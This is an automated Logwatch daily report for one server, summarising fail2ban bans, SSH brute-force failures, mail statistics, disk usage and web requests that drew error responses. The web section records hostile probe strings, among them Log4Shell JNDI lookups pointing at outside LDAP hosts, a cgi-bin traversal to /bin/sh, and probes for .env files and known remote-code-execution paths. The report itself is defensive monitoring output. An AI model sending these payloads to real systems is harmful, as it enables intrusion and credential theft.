################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 18 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-17 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 7 sites probed the server
103.153.76.212
157.245.102.144
20.101.106.180
205.185.124.100
216.238.73.231
61.219.11.151
64.227.41.14
Requests with error response codes
400 Bad Request
null: 11 Time(s)
mstshash=Domain: 4 Time(s)
/config/getuser?index=0: 3 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... -MF3zWbyg92AADk: 3 Time(s)
mstshash=Administr: 3 Time(s)
/: 2 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... FX0JBEznOXtAADg: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
7: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
D\xF0^\xC4\xCA\x16a\xE2\x8Ef\x8Cs\x0C\x97\ ... C0$\x13\x05\xC0: 1 Time(s)
HTTP/1.0: 1 Time(s)
O\x06*\xA2: 1 Time(s)
R\xECG\xDF\x9C\x7F\x1B\xDD\xAE!\xE8\x9A\xB ... H\xCE\x09\x1Ea:: 1 Time(s)
\x01\xB8\xF8AY\xA0]\x87`%\xBC\xD4=w\xBB\x9 ... C0\xAD\xC0$\xC0: 1 Time(s)
\x16\x0E\xCBp\x5C\xEB~\xC1\xE6\xBCW\xDC\x0 ... C0\xAE\xC0+\xC0: 1 Time(s)
\x82m\xD7R\xA3\xF6l~:#x\x15\x0F\x04\xA7\xA ... C\x00<\x00/\x00: 1 Time(s)
\x925\xE0\x1F\x9CB\x8E\x88\xDDv\xEC\xDB~\x ... x09\xC0\x13\xC0: 1 Time(s)
\xC5\xC7\xD4\xA1\xF1S|\xB2\x83H\xF4)\x14X\ ... x09\xC0\x13\xC0: 1 Time(s)
\xC8'!\xEB\x95\xC0\x8A\x94g\xDFm\xB4\xAF\x ... x13\xC0\x11\x00: 1 Time(s)
t\x1B\x1D\xB0\xBF\xA6\x9A\x10\xD1\x98\xCA: 1 Time(s)
t{(a)\xD2\xA1\xC8+T\xB8\xD0.\xC5\xEAt\xBF\xC ... x09\xC0\x13\xC0: 1 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 1 Time(s)
499 (undefined)
/: 10 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 29 Time(s)
/.env: 7 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2 ... lxgpsjkgfrra%7D: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/favicon.ico: 1 Time(s)
/fuel: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (180.76.57.58): 36 Time(s)
root (139.59.228.214): 35 Time(s)
root (r201-217-143-51.ir-static.anteldata.net.uy): 33 Time(s)
root (50.142.80.34.bc.googleusercontent.com): 26 Time(s)
unknown (114.80.85.75): 21 Time(s)
root (113.110.166.25): 20 Time(s)
unknown (201.119.167.25): 20 Time(s)
root (106.13.6.113): 19 Time(s)
unknown (r201-217-143-51.ir-static.anteldata.net.uy): 17 Time(s)
unknown (139.59.228.214): 15 Time(s)
unknown (50.142.80.34.bc.googleusercontent.com): 12 Time(s)
root (113.116.5.156): 11 Time(s)
root (203.160.55.212): 11 Time(s)
unknown (106.13.6.113): 11 Time(s)
unknown (180.76.57.58): 11 Time(s)
root (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (201.119.167.25): 9 Time(s)
root (60.255.230.126): 8 Time(s)
unknown (203.160.55.212): 8 Time(s)
unknown (113.110.166.25): 6 Time(s)
root (178-117-237-173.access.telenet.be): 5 Time(s)
unknown (128.187.26.211.sta.commander.net.au): 5 Time(s)
unknown (60.255.230.126): 5 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 5 Time(s)
root (179.112.19.24): 4 Time(s)
root (115.248.153.89): 2 Time(s)
root (128.187.26.211.sta.commander.net.au): 2 Time(s)
unknown (176.125.36.117): 2 Time(s)
unknown (194.61.26.211): 2 Time(s)
unknown (2.195.224.165): 2 Time(s)
unknown (220.177.194.10): 2 Time(s)
unknown (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 Time(s)
unknown (59.29.227.55): 2 Time(s)
backup (194.61.26.211): 1 Time(s)
postgres (46.161.27.162): 1 Time(s)
root (1.15.181.252): 1 Time(s)
root (103.133.57.250): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (182.74.25.246): 1 Time(s)
root (189.254.255.3): 1 Time(s)
root (210.74.11.97): 1 Time(s)
temp (50.142.80.34.bc.googleusercontent.com): 1 Time(s)
unknown (115.248.153.89): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (178-117-237-173.access.telenet.be): 1 Time(s)
unknown (179.112.19.24): 1 Time(s)
unknown (server.kompraqui.com): 1 Time(s)
Invalid Users:
Unknown Account: 154 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
8.837K Bytes accepted 9,049
8.837K Bytes sent via SMTP 9,049
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
38 Connections
28 Connections lost (inbound)
38 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.15.181.252: 1 time
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 27 times
46.161.27.162: 1 time
60.255.230.126: 8 times
103.133.57.250: 1 time
106.13.6.113: 19 times
113.110.166.25: 20 times
113.116.5.156: 11 times
115.248.153.89: 2 times
139.59.228.214: 35 times
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
164.90.203.55: 1 time
178.117.237.173 (178-117-237-173.access.telenet.be): 5 times
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 4 times
180.76.57.58: 36 times
182.74.25.246: 1 time
189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time
194.61.26.211: 1 time
201.119.167.25: 9 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 33 times
203.160.55.212: 11 times
210.74.11.97: 1 time
211.26.187.128 (128.187.26.211.sta.commander.net.au): 2 times
Illegal users from:
2001:470:1:c84::29: 1 time
undef: 121 times
2.195.224.165: 2 times
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 12 times
59.29.227.55: 2 times
60.255.230.126: 5 times
64.62.197.152: 1 time
91.182.94.240 (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 times
106.13.6.113: 11 times
113.110.166.25: 6 times
114.80.85.75: 21 times
115.248.153.89: 1 time
134.236.247.145: 1 time
139.59.228.214: 15 times
146.185.79.101: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 5 times
154.89.5.72: 1 time
162.214.53.159 (server.kompraqui.com): 1 time
176.125.36.117 (117-36-125-176.wifipon-rsbit.uar.net): 2 times
178.117.237.173 (178-117-237-173.access.telenet.be): 1 time
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 1 time
180.76.57.58: 11 times
194.61.26.211: 2 times
201.119.167.25: 20 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 17 times
203.160.55.212: 8 times
211.26.187.128 (128.187.26.211.sta.commander.net.au): 5 times
220.177.194.10: 2 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################